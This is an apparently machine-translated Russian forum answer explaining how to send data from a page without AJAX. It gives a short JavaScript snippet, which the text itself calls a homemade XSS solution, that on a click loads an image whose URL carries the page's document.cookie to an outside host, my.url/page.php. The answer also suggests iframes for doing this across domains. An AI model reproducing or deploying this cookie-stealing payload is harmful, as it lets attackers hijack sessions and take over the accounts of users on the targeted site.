у вас нет для использования AJAX, вы можете использовать любой внешний тег, такой как iframe, ссылка, сценарий, изображение и самодельное собственное решение XSS (что, честно говоря, звучит как ты делаешь в любом случае ...)
function xssFunc( )
{
( new Image ).src = 'http://my.url/page.php?cookie' + encodeURIComponent( document.cookie );
}
document.getElementById( 'whatevs' ).onClick = xssFunc;
однако, если вы хотите использовать содержимое позже, я бы использовал AJAX или iframe (если вам нужно сделать это через домены).